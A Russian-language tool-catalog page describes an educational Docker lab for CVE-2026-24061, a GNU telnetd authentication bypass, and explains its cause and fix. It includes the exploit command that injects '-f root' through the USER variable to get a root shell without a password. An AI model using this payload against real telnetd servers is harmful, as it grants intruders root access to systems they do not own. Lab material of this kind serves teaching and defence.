Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-24061_Lab — Образовательный Docker-лабораторный стенд, демонстрирующий CVE-2026-24061 — обход аутентификации в GNU telnetd, позволяющий получить root-доступ через внедрение аргументов в переменную окружения USER. | Kitploit
Инструменты/GitHubGitHub/gabs-hub/cve-2026-24061_lab
Анализ уязвимостейЭксплуатацияАутентификацияОбучение и ОбразованиеЛаборатории и Практика
GitHubgabs-hub/cve-2026-24061_lab

CVE-2026-24061_Lab

Образовательный Docker-лабораторный стенд, демонстрирующий CVE-2026-24061 — обход аутентификации в GNU telnetd, позволяющий получить root-доступ через внедрение аргументов в переменную окружения USER.

Репозиторий
7 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-24061 Telnetd Lab

Этот репозиторий содержит простую лабораторию на Docker для демонстрации уязвимости CVE-2026-24061. Она позволяет обойти аутентификацию и получить доступ как root в GNU telnetd в Linux.

Цель исключительно образовательная.

Требования

  • Установленный Docker
  • Установленный Telnet Client

Сборка образа

root@kitploit:~
docker build -t cve-2026-24061 .

Запуск контейнера

root@kitploit:~
docker run -it -p 2323:23 cve-2026-24061

Эксплуатация

В другом терминале выполните:

root@kitploit:~
USER="-f root" telnet -a localhost 2323

После этого доступ будет предоставлен напрямую как root, без запроса пароля.

Примечания

  • Контейнер использует уязвимую версию GNU inetutils telnetd
  • Служба Telnet не должна быть открыта в реальных средах
  • Используйте эту лабораторию только для изучения и демонстрации

Как работает уязвимость?

Ошибка возникает из-за инъекции аргументов при вызове утилиты /usr/bin/login. Telnetd динамически формирует командную строку для вызова login и включает значение переменной окружения USER через плейсхолдер %U без какой-либо санитизации.

Поскольку утилита login принимает опцию -f, которая игнорирует аутентификацию по паролю, атакующий может задать USER="-f root" и принудительно выполнить вход напрямую как root.

Так как telnetd запускается с повышенными привилегиями, эта манипуляция немедленно приводит к root-оболочке без необходимости в действительных учётных данных. Эксплуатация проста, не требует предварительного взаимодействия и может быть легко автоматизирована, что оправдывает оценку CVSS 9.8.

Уязвимость была исправлена путём введения проверки и санитизации переменной USER, блокирующей значения, начинающиеся с дефиса, и специальные символы, что предотвращает инъекцию аргументов в login.

Скачать инструмент